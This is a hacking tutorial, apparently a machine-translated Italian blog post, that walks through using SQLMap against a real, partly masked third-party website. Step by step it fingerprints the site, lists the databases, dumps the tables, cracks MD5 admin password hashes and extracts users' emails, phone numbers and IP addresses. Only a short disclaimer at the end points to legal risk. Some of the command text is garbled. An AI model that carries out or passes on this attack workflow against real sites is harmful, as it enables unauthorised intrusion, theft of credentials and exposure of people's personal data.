SQL Injection is a very common practice among hackers, almost all sites that are managed by SQL databases are vulnerable to SQL Injection (or Query Injection), it is recognized by links ending with * .php? 1 can change) where "id" is the vulnerable variable, but be careful, not all of them are vulnerable. To better explain what SQL injection is we should be talking here for a while, so let's skip over and move on to SQLMap
We start a terminal in root mode through the command
then we navigate to the folder where SQLMap is located through the function
to open SQLMap
This is the structure (Syntax) of SQLMap:
./sqlmap.py (-u stands for URL) << www.sito.it / *. php? id = * >> (to show on screen)
I will take as a target site a slightly dated site (which we obfuscate for obvious reasons): http: //www.p*****b.com/s*********e.php? id = 1
(should be vulnerable)
therefore as a first step we perform the fingerprint of the site through the -u function
then we execute this command:
./sqlmap.py -u http: //www.p*****b.com/s*********e.php? id = 1
Now that we know (almost) everything about this site, we need to know the names of the databases, so we'll use this command:
./sqlmap.py -u http: //www.p*****b.com/s*********e.php? id = 1 --dbs
(–Dbs stands for databases)
once we get the database names, we will select one through the -D option so we will execute these 2 commands in order:
./sqlmap.py -u http: //www.p*****b.com/s********e.php? id = 1 -D p ***** b
./sqlmap.py -u http: //www.p*****b.com/s*********e.php? id = 1 -D p ***** b - -tables --columns --threads 10 --dump
We explain what we do with the two commands:
- With the first we ask SQLMap to analyze the database
-With the second we ask SQLMap to print on screen all the contents of the database (tables, columns), to set 10 threads for a faster search.
Once the scan is finished, find the passwords will ask us to crack just the latter, because unfortunately the passwords are encrypted through MD5, so we press "y" to confirm the operation and define the dictionary we want to use, I used the classic one of SQLMap, pressing "1", then we will ask if we want to use suffixes, now we do not dwell on the suffixes, we press "N" and here is that the cracking procedure will start. If it can't crack the passwords, it writes them in a table (the passwords are encrypted) with the ADMIN names of the site, which we will have to decrypt by ourselves with programs like hashcat
Here is the cracking procedure:
Other passwords found, as you can see are written in MD5 format, that is encrypted and asks us once again to decrypt them.
These are data that he extrapolated but I don't know exactly what they are ...
Once we get the decrypted passwords we just have to look for the ADMIN control panel of the site
With SQLMap we can not only find passwords, we can also extract sensitive data such as EMails, or even phone numbers, IP addresses and more (as we can see in the picture)
we can extract data of this type, asking SQLMap to show us only the tables that in turn contain the columns containing the data, so we have to give it the following command to see all the tables available
./sqlmap.py -u http: //www.p*****b.com/s*********e.php? id = 1 -D p ***** b - -tables --dump
This command instead serves to select a specific table and column (the content of the left column to be clear), we must identify tables like "wp_users" or "user_data" or other, and columns like "emails" "phone_number" "ip" "last_ip " etc…
All this takes place with the command:
./sqlmap.py -u http: //www.p*****b.com/s*********e.php? id = 1 -D p ***** b - T (name of the selected table) -C (name of the column chosen in the table (the left column)) --threads 10 --dump
I hope you enjoyed this guide!
Attention, the information in this guide could be used for illegal purposes, the editorial staff of InTheBit assumes no responsibility. Test it all on your own site to evaluate its safety, otherwise you could incur even serious legal issues.